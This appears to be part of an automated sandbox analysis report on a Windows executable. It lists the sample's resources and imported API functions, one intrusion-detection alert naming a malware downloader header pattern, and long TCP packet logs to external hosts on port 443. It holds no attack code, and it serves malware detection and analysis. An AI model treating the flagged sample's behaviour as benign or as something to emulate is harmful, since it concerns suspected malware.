RT_DIALOG | 0x3eab18 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3eac18 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3ead38 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x3eae00 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3eae60 | 0x76 | data | English | United States | 0.7542372881355932
RT_VERSION | 0x3eaed8 | 0x128 | data | English | United States | 0.6114864864864865
RT_MANIFEST | 0x3eb000 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T21:52:07.420667+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49705 | 142.250.80.78 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 21:52:06.926754951 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:06.926778078 CEST | 443 | 49705 | 142.250.80.78 | 192.168.11.20
Oct 8, 2024 21:52:06.926951885 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:06.937576056 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:06.937587976 CEST | 443 | 49705 | 142.250.80.78 | 192.168.11.20
Oct 8, 2024 21:52:07.173017979 CEST | 443 | 49705 | 142.250.80.78 | 192.168.11.20
Oct 8, 2024 21:52:07.173208952 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:07.173209906 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:07.174153090 CEST | 443 | 49705 | 142.250.80.78 | 192.168.11.20
Oct 8, 2024 21:52:07.174372911 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:07.226254940 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:07.226319075 CEST | 443 | 49705 | 142.250.80.78 | 192.168.11.20
Oct 8, 2024 21:52:07.227520943 CEST | 443 | 49705 | 142.250.80.78 | 192.168.11.20
Oct 8, 2024 21:52:07.227710962 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:07.230649948 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:07.272181034 CEST | 443 | 49705 | 142.250.80.78 | 192.168.11.20
Oct 8, 2024 21:52:07.420659065 CEST | 443 | 49705 | 142.250.80.78 | 192.168.11.20
Oct 8, 2024 21:52:07.420906067 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:07.420917034 CEST | 443 | 49705 | 142.250.80.78 | 192.168.11.20
Oct 8, 2024 21:52:07.421139956 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:07.421199083 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:07.421224117 CEST | 443 | 49705 | 142.250.80.78 | 192.168.11.20
Oct 8, 2024 21:52:07.421314955 CEST | 443 | 49705 | 142.250.80.78 | 192.168.11.20
Oct 8, 2024 21:52:07.421382904 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:07.421446085 CEST | 49705 | 443 | 192.168.11.20 | 142.250.80.78
Oct 8, 2024 21:52:07.547244072 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:07.547262907 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:07.547440052 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:07.547635078 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:07.547643900 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:07.783584118 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:07.783888102 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:07.787285089 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:07.787290096 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:07.787514925 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:07.787678003 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:07.788086891 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:07.828176022 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.259335995 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.259506941 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.259582043 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.259582043 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.275325060 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.275659084 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.283427000 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.283699036 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.283699989 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.290627003 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.290836096 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.290916920 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.291137934 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.382872105 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.383057117 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.383172989 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.383302927 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.383421898 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.383444071 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.383512974 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.383547068 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.383770943 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.383771896 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.383856058 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.384195089 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.389678001 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.389894962 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.389964104 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.390161037 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.397690058 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.397898912 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.397973061 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.398176908 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.411850929 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.412012100 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.412075043 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.412354946 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.416161060 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.416409969 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.416466951 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.416722059 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.421829939 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.422079086 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.422146082 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.422481060 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.429369926 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.429620981 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.429692984 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.429939985 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.442852020 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.443062067 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.443133116 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.443476915 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.448110104 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.448322058 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.448393106 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.448733091 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.451617002 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.451867104 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.451947927 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.452258110 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.459048033 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.459300041 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.459388971 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.459642887 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.466418982 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.466739893 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.476789951 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.476972103 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.494884014 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.495100975 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.495172024 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.495438099 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.498289108 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.498554945 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.498627901 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.498889923 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.507451057 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
Oct 8, 2024 21:52:10.507715940 CEST | 49706 | 443 | 192.168.11.20 | 142.251.40.129
Oct 8, 2024 21:52:10.507795095 CEST | 443 | 49706 | 142.251.40.129 | 192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.508018970 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.512784004 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.513046026 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.513127089 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.513375998 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.516058922 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.516264915 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.516360998 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.516608000 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.521470070 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.521687031 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.521758080 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.521790981 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.522047997 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.526726007 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.527045965 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.527124882 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.527416945 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.534389019 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.534722090 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.534791946 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.535096884 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.546056986 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.546350956 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.546427965 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.546477079 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.546506882 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.546601057 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.546768904 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.548345089 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.548595905 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.548680067 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.548959970 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.553726912 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.553977966 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.554039001 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.554351091 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.558825970 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.559039116 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.559101105 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.559341908 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.564610004 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.564785004 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.564841032 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.565017939 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.578788996 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.578986883 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.579164028 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.579360962 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.579433918 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.579628944 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.579763889 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.579960108 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.580017090 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.580257893 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.580310106 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.580476999 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.584486008 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.584763050 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.584826946 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.585095882 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.589456081 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.589772940 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.589814901 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.590039968 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.593911886 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.594082117 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.594146013 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.594465017 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.608782053 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.608999968 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.609020948 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.609083891 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.609191895 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.609249115 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.609281063 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.609405041 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.609481096 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.609503984 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.609719992 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.613199949 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.613372087 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.613436937 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.613718033 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.616363049 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.616532087 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.616591930 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.616918087 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.619489908 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.619652987 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.619715929 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.620028973 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.622409105 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.622766018 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.622813940 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.623013020 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.625788927 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.625958920 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.626023054 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.626343966 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.629115105 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.629350901 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.629414082 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.629687071 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.634999037 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.635159016 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.635222912 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.635334969 CEST44349706142.251.40.129192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 21:52:10.635516882 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.635516882 CEST49706443192.168.11.20142.251.40.129
                                                                                                                                                                                  Oct 8, 2024 21:52:10.635566950 CEST44349706142.251.40.129192.168.11.20
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Oct 8, 2024 21:52:10.635788918 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.643830061 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.644118071 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.644120932 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.644201040 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.644292116 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.644474030 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.644507885 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.644743919 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.644918919 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.645253897 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.645289898 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.645585060 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.647010088 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.647212982 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.647253036 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.647537947 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.650019884 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.650249004 CEST  49706        443        192.168.11.20   142.251.40.129
Oct 8, 2024 21:52:10.650289059 CEST  443          49706      142.251.40.129  192.168.11.20
Oct 8, 2024 21:52:10.650501013 CEST  49706        443        192.168.11.20   142.251.40.129
